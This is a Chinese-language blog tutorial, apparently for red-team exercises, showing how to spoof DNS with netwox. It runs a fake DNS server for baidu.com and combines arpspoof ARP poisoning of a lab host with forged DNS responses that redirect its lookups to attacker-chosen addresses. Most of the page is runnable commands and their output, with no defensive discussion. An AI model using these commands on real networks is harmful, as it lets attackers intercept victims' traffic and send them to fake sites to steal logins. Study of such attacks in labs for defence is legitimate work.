正文

HVV:DNS伪造

admin
admin V管理员 /0 评论 /205 阅读
0818
此篇文章发布距今已超过463天,您需要注意文章的内容或图片是否可用!


1、伪造DNS服务器


DNS服务器是进行域名和与之相对应的IP地址转换的服务器。正常情况下,用户访问域名网站,首先从DNS服务器上或权威名称服务器上获取域名对应的IP地址,然后根据该IP地址访问网站。为了能够使用户混淆,netwox工具提供了编号为104的模块。它可以伪造DNS服务器,手动设置假的域名与IP地址的对应关系。这样,用户会获取一个域名对应的错误IP地址。

在主机192.168.59.133上伪造域名baidu.com的DNS服务器。

1)伪造域名baidu.com的DNS服务器,伪造该域名对应的IP地址为110.111.112.113,该域名的权威名称服务器为123.baidu.com,对应的IP地址为56.67.78.89。执行命令如下:

root@daxueba:~# netwox 104 -h baidu.com -H 110.111.112.113 -a 123.baidu.com -A 56.67.78.89

执行命令后将成功伪造域名baidu.com的DNS服务器,当有用户向该服务器请求域名baidu.com对应的IP地址时,将会给出伪造的地址。

2)这时,使用netwox工具中编号为102的模块,请求域名baidu.com对应的IP地址,执行命令如下:

root@daxueba:~# netwox 102 -i 192.168.59.133 -n baidu.com -y a

执行命令后,将从伪造的DNS服务器(地址为192.168.59.133)上获取对应的IP地址、权威服务器以及对应的IP地址信息。获取到的信息如下:

DNS_question_________________________________________________. #DNS请求
| id=29841  rcode=OK             opcode=QUERY
| aa=0 tr=0 rd=0 ra=0  quest=1  answer=0  auth=0  add=0
| baidu.com. A
|__________________________________________________________
DNS_answer________________________________________________.  #DNS响应
| id=29841  rcode=OK             opcode=QUERY
| aa=1 tr=0 rd=0 ra=0  quest=1  answer=1  auth=1  add=1
| baidu.com. A
| baidu.com. A 10 110.111.112.113 #域名对应的IP地址
| 123.baidu.com. NS 10 123.baidu.com. #权威服务器名称
| 123.baidu.com. A 10 56.67.78.89 #权威服务器IP地址
|_____________________________________________________________

从输出信息可以看到,获取到的域名baidu.com对应的IP地址为伪造的地址110.111.112.113,该域名的权威服务器也是伪造的服务器123.baidu.com,对应的IP地址为56.67.78.89。


2、伪造DNS响应

在中间人攻击中,当用户访问特定的网站,可以通过伪造DNS响应,将用户引导到一个虚假的网站。netwox工具提供的编号为105的模块,可以用来伪造DNS响应包。

已知主机A的IP地址为192.168.59.133,主机B的IP地址为192.168.59.135。下面介绍主机A对主机B实施ARP攻击,在主机A上监听主机B的DNS请求,并伪造DNS响应。

1)主机A对主机B实施ARP攻击,执行命令如下:

root@daxueba:~# arpspoof -i eth0 -t 192.168.59.135 192.168.59.2

该命令表示对主机B实施ARP攻击,伪造的是网关192.168.59.2。执行命令后输出信息如下:

0:c:29:fd:de:b8 0:c:29:ca:e4:66 0806 42: arp reply 192.168.59.2 is-at 0:c:29:fd:de:b8
0:c:29:fd:de:b8 0:c:29:ca:e4:66 0806 42: arp reply 192.168.59.2 is-at 0:c:29:fd:de:b8
0:c:29:fd:de:b8 0:c:29:ca:e4:66 0806 42: arp reply 192.168.59.2 is-at 0:c:29:fd:de:b8
0:c:29:fd:de:b8 0:c:29:ca:e4:66 0806 42: arp reply 192.168.59.2 is-at 0:c:29:fd:de:b8
···    #省略其他信息

上述输出信息表示成功发起了ARP攻击,使主机B认为网关192.168.59.2的MAC地址为00:0c:29:fd:de:b8(实施攻击的主机A的MAC地址)。

2)在主机A上监听主机B的DNS请求包,并伪造DNS响应,使其返回指定的DNS响应。例如,设置DNS响应包域名www.baidu.con对应的IP地址为101.102.103.104,权威名称服务器123.baidu.com对应的IP地址为55.66.77.88。执行命令如下:

root@daxueba:~# netwox 105 -h www.baidu.com -H 101.102.103.104 -a 123.baidu.com -A 55.66.77.88

执行命令后,没有输出信息。因为主机B没有产生DNS请求。

3)当主机B上产生了DNS请求,该请求将会被主机A监听到,并返回设置的DNS响应包的信息。例如,当主机B访问www.baidu.con,主机A监听并返回的DNS响应如下:

root@daxueba:~# netwox 105 -h www.baidu.com -H 101.102.103.104 -a 123.baidu.com -A 55.66.77.88
DNS_question_____________________________.  #DNS请求
| id=22684  rcode=OK             opcode=QUERY
| aa=0 tr=0 rd=1 ra=0  quest=1  answer=0  auth=0  add=0
| www.baidu.com. A
|______________________________________________________
DNS_answer_______________________________. #DNS响应
| id=22684  rcode=OK             opcode=QUERY
| aa=1 tr=0 rd=1 ra=1  quest=1  answer=1  auth=1  add=1
| www.baidu.com. A
| www.baidu.com. A 10 101.102.103.104
| 123.baidu.com. NS 10 123.baidu.com.
| 123.baidu.com. A 10 55.66.77.88
|_________________________________________________________

其中,DNS_question部分为监听到的主机B发送的www.baidu.com的DNS请求包信息,DNS_answer部分为主机A伪造的DNS响应信息,成功返给了主机B。



推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
周飒博客-ZhouSa.com